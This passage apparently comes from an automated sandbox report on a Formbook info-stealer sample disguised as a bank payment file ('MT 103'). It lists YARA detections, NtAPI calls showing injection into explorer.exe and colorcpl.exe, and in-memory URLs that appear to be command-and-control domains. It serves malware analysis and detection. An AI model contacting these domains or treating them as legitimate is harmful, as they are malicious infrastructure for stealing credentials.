Source: explorer.exe, 00000006.00000002.4525788642.0000000003545000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3852075200.0000000003545000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3094805181.0000000003542000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.oko.eventsReferer:
Source: explorer.exe, 00000006.00000002.4525788642.0000000003545000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3852075200.0000000003545000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3094805181.0000000003542000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.orenzoplaybest14.xyz
Source: explorer.exe, 00000006.00000002.4525788642.0000000003545000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3852075200.0000000003545000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3094805181.0000000003542000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.orenzoplaybest14.xyz/c24t/
Source: explorer.exe, 00000006.00000002.4525788642.0000000003545000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3852075200.0000000003545000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3094805181.0000000003542000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.orenzoplaybest14.xyz/c24t/www.j88.travel
Source: explorer.exe, 00000006.00000002.4525788642.0000000003545000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3852075200.0000000003545000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3094805181.0000000003542000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.orenzoplaybest14.xyzReferer:
Source: explorer.exe, 00000006.00000002.4525788642.0000000003545000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3852075200.0000000003545000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3094805181.0000000003542000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.ourhealthyourlife.shop
Source: explorer.exe, 00000006.00000002.4525788642.0000000003545000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3852075200.0000000003545000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3094805181.0000000003542000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.ourhealthyourlife.shop/c24t/
Source: explorer.exe, 00000006.00000002.4525788642.0000000003545000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3852075200.0000000003545000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3094805181.0000000003542000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.ourhealthyourlife.shop/c24t/www.amilablackwell.online
Source: explorer.exe, 00000006.00000002.4525788642.0000000003545000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3852075200.0000000003545000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3094805181.0000000003542000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.ourhealthyourlife.shopReferer:
Source: explorer.exe, 00000006.00000002.4525788642.0000000003545000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3852075200.0000000003545000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3094805181.0000000003542000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.ridges-freezers-56090.bond
Source: explorer.exe, 00000006.00000002.4525788642.0000000003545000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3852075200.0000000003545000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3094805181.0000000003542000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.ridges-freezers-56090.bond/c24t/
Source: explorer.exe, 00000006.00000002.4525788642.0000000003545000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3852075200.0000000003545000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3094805181.0000000003542000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.ridges-freezers-56090.bond/c24t/www.consuyt.xyz
Source: explorer.exe, 00000006.00000002.4525788642.0000000003545000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3852075200.0000000003545000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3094805181.0000000003542000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.ridges-freezers-56090.bondReferer:
Source: explorer.exe, 00000006.00000002.4525788642.0000000003545000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3852075200.0000000003545000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3094805181.0000000003542000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.vto.stream
Source: explorer.exe, 00000006.00000002.4525788642.0000000003545000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3852075200.0000000003545000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3094805181.0000000003542000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.vto.stream/c24t/
Source: explorer.exe, 00000006.00000002.4525788642.0000000003545000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3852075200.0000000003545000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3094805181.0000000003542000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.vto.stream/c24t/www.fbpd.top
Source: explorer.exe, 00000006.00000002.4525788642.0000000003545000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3852075200.0000000003545000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3094805181.0000000003542000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.vto.streamReferer:
Source: explorer.exe, 00000006.00000000.2091503480.000000000C4DC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppcrobat.exe
Source: explorer.exe, 00000006.00000000.2084445770.00000000076F8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4528531386.00000000076F8000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://android.notify.windows.com/iOS
Source: explorer.exe, 00000006.00000000.2087085209.0000000009ADB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4535238985.0000000009ADB000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/
Source: explorer.exe, 00000006.00000000.2084445770.0000000007637000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4528531386.0000000007637000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
Source: explorer.exe, 00000006.00000002.4525901198.00000000035FA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3094805181.00000000035FA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.2083176796.00000000035FA000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://arc.msn.coml
Source: explorer.exe, 00000006.00000002.4536248023.0000000009C22000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.2087085209.0000000009B41000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3852394132.0000000009C21000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3851742437.0000000009BAA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3094406627.0000000009B9A000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://excel.office.com
Source: explorer.exe, 00000006.00000000.2087085209.0000000009B41000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3094406627.0000000009D42000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3851742437.0000000009BAA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4536299866.0000000009C96000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3851951539.0000000009C92000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://outlook.com
Source: explorer.exe, 00000006.00000000.2091503480.000000000C460000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4539423955.000000000C460000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://powerpoint.office.comcember
Source: explorer.exe, 00000006.00000002.4535238985.00000000099C0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.2087085209.00000000099C0000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://wns.windows.com/)s
Source: explorer.exe, 00000006.00000002.4535238985.00000000099C0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.2087085209.00000000099C0000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://word.office.comon
Source: explorer.exe, 00000006.00000002.4542330951.00000000108CF000.00000004.80000000.00040000.00000000.sdmp, colorcpl.exe, 00000007.00000002.4524605308.0000000004542000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000007.00000002.4525657020.0000000004CEF000.00000004.10000000.00040000.00000000.sdmp, hbwebdownload - MT 103.exe	String found in binary or memory: https://www.chiark.greenend.org.uk/~sgtatham/putty/0
Source: explorer.exe, 00000006.00000002.4542330951.0000000010DBF000.00000004.80000000.00040000.00000000.sdmp, colorcpl.exe, 00000007.00000002.4525657020.00000000051DF000.00000004.10000000.00040000.00000000.sdmp	String found in binary or memory: https://www.j88.travel/c24t/?Edg8Tp=iDjdFciE5wc5h9D9V74ZS/2sliUdDJEhqWnTSCKxgeFtQoD7uajT9bZ2

E-Banking Fraud

Malicious sample detected (through community Yara rule)

Source: Yara match	File source: 4.2.hbwebdownload - MT 103.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.hbwebdownload - MT 103.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000004.00000002.2140305383.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.4524389651.0000000002C20000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.4523888584.00000000005B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2092991914.000000000484A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.4524319373.0000000002BF0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

System Summary

Source: 4.2.hbwebdownload - MT 103.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 4.2.hbwebdownload - MT 103.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 4.2.hbwebdownload - MT 103.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 4.2.hbwebdownload - MT 103.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 4.2.hbwebdownload - MT 103.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 4.2.hbwebdownload - MT 103.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000004.00000002.2140305383.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000004.00000002.2140305383.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000004.00000002.2140305383.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000007.00000002.4524389651.0000000002C20000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000007.00000002.4524389651.0000000002C20000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000007.00000002.4524389651.0000000002C20000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000007.00000002.4523888584.00000000005B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000007.00000002.4523888584.00000000005B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000007.00000002.4523888584.00000000005B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.2092991914.000000000484A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000000.00000002.2092991914.000000000484A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000000.00000002.2092991914.000000000484A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000007.00000002.4524319373.0000000002BF0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000007.00000002.4524319373.0000000002BF0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000007.00000002.4524319373.0000000002BF0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: Process Memory Space: hbwebdownload - MT 103.exe PID: 1992, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: Process Memory Space: hbwebdownload - MT 103.exe PID: 3668, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: Process Memory Space: colorcpl.exe PID: 1412, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown

Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_0041A330 NtCreateFile,	4_2_0041A330
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_0041A3E0 NtReadFile,	4_2_0041A3E0
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_0041A460 NtClose,	4_2_0041A460
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_0041A510 NtAllocateVirtualMemory,	4_2_0041A510
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_0041A2EA NtCreateFile,	4_2_0041A2EA
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_0041A32A NtCreateFile,	4_2_0041A32A
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_0041A3DA NtReadFile,	4_2_0041A3DA
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_0041A45E NtClose,	4_2_0041A45E
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_0041A50A NtAllocateVirtualMemory,	4_2_0041A50A
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_012C2B60 NtClose,LdrInitializeThunk,	4_2_012C2B60
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_012C2BF0 NtAllocateVirtualMemory,LdrInitializeThunk,	4_2_012C2BF0
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_012C2AD0 NtReadFile,LdrInitializeThunk,	4_2_012C2AD0
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_012C2D30 NtUnmapViewOfSection,LdrInitializeThunk,	4_2_012C2D30
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_012C2D10 NtMapViewOfSection,LdrInitializeThunk,	4_2_012C2D10
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_012C2DF0 NtQuerySystemInformation,LdrInitializeThunk,	4_2_012C2DF0
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_012C2DD0 NtDelayExecution,LdrInitializeThunk,	4_2_012C2DD0
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_012C2C70 NtFreeVirtualMemory,LdrInitializeThunk,	4_2_012C2C70
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_012C2CA0 NtQueryInformationToken,LdrInitializeThunk,	4_2_012C2CA0
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_012C2F30 NtCreateSection,LdrInitializeThunk,	4_2_012C2F30
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_012C2FB0 NtResumeThread,LdrInitializeThunk,	4_2_012C2FB0
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_012C2F90 NtProtectVirtualMemory,LdrInitializeThunk,	4_2_012C2F90
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_012C2FE0 NtCreateFile,LdrInitializeThunk,	4_2_012C2FE0
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_012C2EA0 NtAdjustPrivilegesToken,LdrInitializeThunk,	4_2_012C2EA0
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_012C2E80 NtReadVirtualMemory,LdrInitializeThunk,	4_2_012C2E80
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_012C4340 NtSetContextThread,	4_2_012C4340
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_012C4650 NtSuspendThread,	4_2_012C4650
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_012C2BA0 NtEnumerateValueKey,	4_2_012C2BA0
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_012C2B80 NtQueryInformationFile,	4_2_012C2B80
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_012C2BE0 NtQueryValueKey,	4_2_012C2BE0
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_012C2AB0 NtWaitForSingleObject,	4_2_012C2AB0
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_012C2AF0 NtWriteFile,	4_2_012C2AF0
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_012C2D00 NtSetInformationFile,	4_2_012C2D00
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_012C2DB0 NtEnumerateKey,	4_2_012C2DB0
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_012C2C00 NtQueryInformationProcess,	4_2_012C2C00
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_012C2C60 NtCreateKey,	4_2_012C2C60
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_012C2CF0 NtOpenProcess,	4_2_012C2CF0
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_012C2CC0 NtQueryVirtualMemory,	4_2_012C2CC0
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_012C2F60 NtCreateProcessEx,	4_2_012C2F60
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_012C2FA0 NtQuerySection,	4_2_012C2FA0
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_012C2E30 NtWriteVirtualMemory,	4_2_012C2E30
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_012C2EE0 NtQueueApcThread,	4_2_012C2EE0
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_012C3010 NtOpenDirectoryObject,	4_2_012C3010
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_012C3090 NtSetValueKey,	4_2_012C3090
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_012C35C0 NtCreateMutant,	4_2_012C35C0
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_012C39B0 NtGetContextThread,	4_2_012C39B0
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_012C3D10 NtOpenProcessToken,	4_2_012C3D10
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_012C3D70 NtOpenThread,	4_2_012C3D70
Source: C:\Windows\explorer.exe	Code function: 6_2_0E7E1232 NtCreateFile,	6_2_0E7E1232
Source: C:\Windows\explorer.exe	Code function: 6_2_0E7E2E12 NtProtectVirtualMemory,	6_2_0E7E2E12
Source: C:\Windows\explorer.exe	Code function: 6_2_0E7E2E0A NtProtectVirtualMemory,	6_2_0E7E2E0A
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_04812CA0 NtQueryInformationToken,LdrInitializeThunk,	7_2_04812CA0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_04812C60 NtCreateKey,LdrInitializeThunk,	7_2_04812C60
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_04812C70 NtFreeVirtualMemory,LdrInitializeThunk,	7_2_04812C70
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_04812DD0 NtDelayExecution,LdrInitializeThunk,	7_2_04812DD0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_04812DF0 NtQuerySystemInformation,LdrInitializeThunk,	7_2_04812DF0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_04812D10 NtMapViewOfSection,LdrInitializeThunk,	7_2_04812D10
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_04812EA0 NtAdjustPrivilegesToken,LdrInitializeThunk,	7_2_04812EA0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_04812FE0 NtCreateFile,LdrInitializeThunk,	7_2_04812FE0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_04812F30 NtCreateSection,LdrInitializeThunk,	7_2_04812F30
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_04812AD0 NtReadFile,LdrInitializeThunk,	7_2_04812AD0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_04812BE0 NtQueryValueKey,LdrInitializeThunk,	7_2_04812BE0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_04812BF0 NtAllocateVirtualMemory,LdrInitializeThunk,	7_2_04812BF0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_04812B60 NtClose,LdrInitializeThunk,	7_2_04812B60
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_048135C0 NtCreateMutant,LdrInitializeThunk,	7_2_048135C0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_04814650 NtSuspendThread,	7_2_04814650
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_04814340 NtSetContextThread,	7_2_04814340
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_04812CC0 NtQueryVirtualMemory,	7_2_04812CC0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_04812CF0 NtOpenProcess,	7_2_04812CF0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_04812C00 NtQueryInformationProcess,	7_2_04812C00
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_04812DB0 NtEnumerateKey,	7_2_04812DB0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_04812D00 NtSetInformationFile,	7_2_04812D00
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_04812D30 NtUnmapViewOfSection,	7_2_04812D30
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_04812E80 NtReadVirtualMemory,	7_2_04812E80
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_04812EE0 NtQueueApcThread,	7_2_04812EE0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_04812E30 NtWriteVirtualMemory,	7_2_04812E30
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_04812F90 NtProtectVirtualMemory,	7_2_04812F90
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_04812FA0 NtQuerySection,	7_2_04812FA0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_04812FB0 NtResumeThread,	7_2_04812FB0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_04812F60 NtCreateProcessEx,	7_2_04812F60
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_04812AB0 NtWaitForSingleObject,	7_2_04812AB0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_04812AF0 NtWriteFile,	7_2_04812AF0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_04812B80 NtQueryInformationFile,	7_2_04812B80
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_04812BA0 NtEnumerateValueKey,	7_2_04812BA0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_04813090 NtSetValueKey,	7_2_04813090
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_04813010 NtOpenDirectoryObject,	7_2_04813010
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_04813D10 NtOpenProcessToken,	7_2_04813D10
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_04813D70 NtOpenThread,	7_2_04813D70
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_048139B0 NtGetContextThread,	7_2_048139B0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_005CA330 NtCreateFile,	7_2_005CA330
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_005CA3E0 NtReadFile,	7_2_005CA3E0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_005CA460 NtClose,	7_2_005CA460
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_005CA510 NtAllocateVirtualMemory,	7_2_005CA510
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_005CA2EA NtCreateFile,	7_2_005CA2EA
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_005CA32A NtCreateFile,	7_2_005CA32A
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_005CA3DA NtReadFile,	7_2_005CA3DA
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_005CA45E NtClose,	7_2_005CA45E
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_005CA50A NtAllocateVirtualMemory,	7_2_005CA50A
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_0469A036 NtQueryInformationProcess,NtSuspendThread,NtSetContextThread,NtQueueApcThread,NtResumeThread,	7_2_0469A036
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_04699BAF NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtUnmapViewOfSection,NtClose,	7_2_04699BAF
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_0469A042 NtQueryInformationProcess,	7_2_0469A042
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_04699BB2 NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	7_2_04699BB2

Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 0_2_0156D5BC	0_2_0156D5BC
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 0_2_07568F30	0_2_07568F30
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 0_2_07563F20	0_2_07563F20
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 0_2_07561E48	0_2_07561E48
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 0_2_07564430	0_2_07564430
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 0_2_07562270	0_2_07562270
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 0_2_07561A10	0_2_07561A10
